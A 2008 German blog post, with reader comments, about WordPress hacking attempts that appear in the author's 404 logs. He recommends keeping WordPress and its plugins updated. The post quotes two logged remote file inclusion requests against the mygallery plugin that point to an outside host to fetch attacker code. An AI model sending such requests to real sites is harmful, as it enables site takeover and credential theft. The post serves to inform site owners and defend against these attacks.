WordPress hacken – so geht’s (nicht)
Donnerstag, 18. September 2008 - 22:36 Uhr
Tjoa, es scheint sich zu lohnen, WordPress-Blogs zu hacken. Zumindest wenn man sich mal so anschaut, welche Anfragen auf nicht-existente Beiträge an der 404-Fehlerseite ankommen (404 ist der Statuscode für ‘Seite nicht gefunden’). Dort finden sich dann Seitenaufrufe wie
/blog/2007/powered-by-ja-woby-eigentlich/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.padellino.com/prc.gif?
/blog/2008/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.padellino.com/prc.gif?
und viele weitere Versuche der gleichen Bauart. Interessanterweise treten solche Hack-Versuche nicht von einem Server auf, sondern im Rudel von verschiedenen Servern aus – ich nehme an, dass mit WordPress-Blogs eine Art Botnetz aufgebaut werden kann.
Dieses Netz wird dann zeitgesteuert zur Attacke auf weitere Blogs verwendet. Dabei wird versucht, über Sicherheitslücken in (älteren Versionen) von Plugins (oben wohl mygallery) einen externen Code zur Ausführung zu bringen, der dann die Zugangsdaten ausspäht und ‘nach Hause’ schickt. Dadurch kann dieses Blog bzw. der betroffene Webspace zur weiteren Verbreitung des Netzes und für allerlei andere Späße (Kommentar- und Email-Spam sind denkbar) missbraucht werden.
Und was tut man dagegen? Nun, wohl vor allem sowohl WordPress als auch alle Plugins auf dem aktuellsten Stand halten – und natürlich hoffen, dass nichts passiert. Zusätzlich kann man sich lustige Dinge überlegen, wie etwa ein Rewrite solcher Anfragen auf ein großes Bild (genügend Traffic vorausgesetzt)…
Bildquelle: stock.xchng #598413
loading...
Ähnliche Beiträge
- CommentLuv und wpTwitBox – neue Plugins im Einsatz 7. April 2010
- WordPress-Plugin: Abmahnung wegen “Subscribe to Comments” 20. Oktober 2008
- [Lösung] Fehler durch Breadcrumb NavXT WordPress Plugin 13. März 2012
- PHP: Einen Artikel in WordPress einfügen 9. September 2008
- Update auf WordPress 2.7 und No-Nofollow 27. Februar 2009
Hacken, Wordpress | Kommentar schreiben | Trackback einrichten
Hey, hier bloggt Jan Papenbrock. Er studiert Wirtschaftsinformatik an der Uni Münster. Nebenbei erstellt er Webseiten und interessiert sich für SEO.
Jaaan, schreib doch mal wieder Sachen, die ich auch verstehe!
Jaaaan, es gibt auch leute die schreiben einfach so irgendwelche Sachen hinter die solvium.de Domain…
Jaaaaa, es gibt auch Leute, die sind wirklich lustig …
^^
Hm, mal ne ganz blöde Frage, geht es wirklich WordPress zu hacken?? Ich habe nämlich letzten ein Blog gefunden, da stand sowas wie “Hacked by Al YeriZ” oder sowas…Hab ehrlich gesagt wenig Lust, dass mir sowas passiert!
Nuja, der einfachste “Hack” ist wohl das Knacken des Passworts – viele Leute nehmen immer noch einfach Passwörter wie hallo oder 12345… Ansonsten ist wohl kaum ein System unhackbar, und bei WordPress bieten zusätzlich noch Plugins eine mögliche Angriffsfläche. Ich bin aber der Meinung, dass regelmäßige Updates schon einigermaßen guten Schutz bieten.
den ersten Hack hab ich schon
das mit dem Hack ist ja kein Problem, denn irgendwelche Lücken gibt es immer. Doch wozu hösten um sich heimlich Backlinks zu setzen aber naja?
Die Lücken zum Hacken findet man sehr schnell. Aber warum sollte man es tun und vor allem, was hat man davon? – Nix!
Seltsamer Name, kostet dann den Link.
Zum glück hatte ich solche Probleme noch nicht mit meinen Blogs. Aber gut zu wissen.
Kein seltsamer Name, Link ist trotzdem raus.
Danke! Ich habe alle plugins aktualisiert!
Grüße,
Tom
Ganz ehrlich, ich arbeite in einem Versicherungsunternehmen und sehe zahlreiche Kunden die einige Blogs führen un diese nicht updaten. WordPresshacker greifen mist Blogs an, die sehr alte Versionsnummern haben. Also, immer brav updaten
der Link ist interessant, auch wenn ich ihn leider nicht ganz verstehen, aber prinzipiell gut zu wissen, dass es solche angriffe gibt…. vielleicht sollte ich doch meine wordpress version einmal updaten :-I
Die sicherste Methode ist neben dem regelmäßigen Updaten der benutzten Software immer noch die, einen Profie ranzulassen. Ich habe zum Glück jemanden gefunden, der sich wirklich gut auskennt und nicht nur rumpfuscht. Wenn ich mich selbst kümmern müsste, wäre ich aufgeschmissen. Also öfter mal den Profi ranlassen. Dann ist man wenigstens ein bisschen sicherer.
Hab es gerade bei einem Kollegen erlebt dass der Inhalt seiner Seite ausgetauscht wurde. Im Google Cach befindet sich eine ganz andere Webseite. Wir haben bisschen recherchiert und mussten festellen dass da paar tausend Blogs verändert wurden, immer mit dem gleichen Inhalt. Darum wurde seine Domain, vermutlich wegen DC abgestrafft. Man kann wirklich nur hoffen dass sowas einem nicht selbst passiert.
Gruß Live
Hallo Live,
hat dein Freund es irgendwie geschafft diese Strafe wieder loszuwerden. Ich hatte genaudasselebe Problem. Dumm ist nur man merkt die Sache erst später und kann nicht schnell genug reagiern. Nun habe ich auch die Strafe am hals und kein plan was ich tun kann
Also ich frage mich immer wieder, was Hacker davon haben irgendwelche Internetseiten zu hacken. Da bekommt man ja nicht wirklich Geld für oder sowas… Einfach nervig!
MfG
Seit über 3 Jahren habe ich WordPress im Einsatz und kann mitteilen, dass mein System bis heute nie geknackt wurde.
Mit phpnuke hatte ich immer Probleme, d.h. phpnuke wurde immer gehackt, obwohl ich immer auf die Sicherheit geachtet hatte
Wp hacken ist so eine Geschichte, ich denke alles ist Möglich, jedes System läßt sich irrgentwie hacken. Gruss Thorsten.
Eine Internetseite von mir wurde neulich gehackt und Google hat sie direkt aus dem Index geschmissen. Tja, viel Geld umsonst investiert.
@Martin: Das sollte sich eigentlich nach Beseitigung der Schäden durch einen Reinclusion Request bei Google regeln lassen: https://www.google.com/webmasters/tools/reconsideration
@Martin … mir ist es jetzt schon zweimal passiert das mein privater Blog gehackt wurde…. sehr ärgerlich und man verliert dann auch die Lust
LG
Frank
S***** WordPress hackerei und Botznetze, kann jedem wirklich nur empfehlen seine WP Version und die der Plugins immer aktuell zu halten!! Zudem sollte man nicht einfach blind jedes Plugin installieren!
Autsch……
Bisher zum Glück bin ich verschont geblieben.
Viele Grüße, Tom
Also wenn man stets die aktuelle Version von WordPress nutzt, sollte man eigentlich auf der halbwegs sicheren Seite sein. ältere Versionen dagegen haben wirklich einige Lücken, die gekonnte Hacker schnell ausnützen können. HAb selber schon so eine Erfahrung gemacht
Hatte bis jetzt noch keine Probleme mit Hackern…Aber was nich is kann ja noch kommen. Deshalb immer die Augen aufhalten.
Ich erinnere mich noch genau an einen Kommentar das man ja WP und Server allgemein kaum über das PW knacken / hacken würde. Bisher muss ich auch sagen das ich doch wohl Glück hatte das ausser einem einstigen Freund niemand versuchte irgendetwas auf meinen Seiten zu machen. Damals haben wir zusammen drei oder vier Projekte gehabt die wir geneinsam betreuten und er daher die PW’s hatte und mehrfach Daten gelöscht hat / PW geändert hat. Aber solange man immer ordentliche Backups zu Hause liegen hat, kann eigentlich kaum etwas passieren. Nutze für derlei mittlerweile MySQL Linkdumper der mir automatisch alle X Tage ein Backup meiner SQL Datenbanken zieht und ein weiterer Cronjob startet eine PERL aufgabe zum packen der auf dem Server liegenden Daten, welche auf einem zweiten Server, der rein zum Datensichern gedacht ist, gespeichert werden.
Das mit dem Sichern des Webspace hat nur den ‘Nachteil’ das will immer aufgeräumt werden und man sollte nicht vergessen alle paar Wochen sich das ganze auch am besten noch auf die eigene Platte zu sichern. Safety first!
Auf diese Weise glaube ich dann doch das ich so ziemlich sicher und gefeit vor Datenverlust bin. Wird der Server dann doch gehackt, PW knacken dürfte sich ‘etwas’ schwer gestalten bei Kryptischen kombinationen, dann heisst es nur noch Serveranbieter anrufen und den das regeln lassen. Daten eventuell neu hoch und frieden. Je nach dem ob man weiss wo die Lücke ist/war.
Liebe Grüße
Sasha
.-= Aktueller Blogbeitrag: Hong Kong Half Dollar Silbermünze aus dem Jahr 1867 =-.
P.S.: Darf ich fragen wie du deinen CommentLuv konfiguriert hast? Ich nutze es bisher nicht, weil ich leider eingestehen muss, das ich absolut keinerlei Ahnung habe wie ich das machen muss.
Habe das Plugin einmal eingebaut, aber es wollte garnicht funktionieren. Bei deinen Kommentaren hier nun gefällt mir der Style aber richtig gut und da würde ich mich eventuell doch nochmal etwas mehr damit beschäftigen müssen.
Liebe Grüße
Sasha
.-= Aktueller Blogbeitrag: Hong Kong Half Dollar Silbermünze aus dem Jahr 1867 =-.
Ich bin “zum Glück” auch noch nicht in den Genuß eines gehakten WordPress gekommen. Aber abgesehen davon ist es egal ob WordPress oder eine andere Software. Software sollte immer auf dem aktuellsten Stand gehalten werden.
Habe schon schlechte Erfahrungen mit WorldPress gemacht =( Ich setzte auf Drupal =)
Hatte bis jetzt noch keine Probleme mit Hackern…nur mit Spam.
Gruß
Kai
Möchtest du einen sicheren Computer etc.
Ziehe das Kabel raus und stelle es in den Keller.
Perfekt, Danke! Ich habe mir schon Sorgen gemacht, dass ich auch bald ein Opfer von Hackern werde!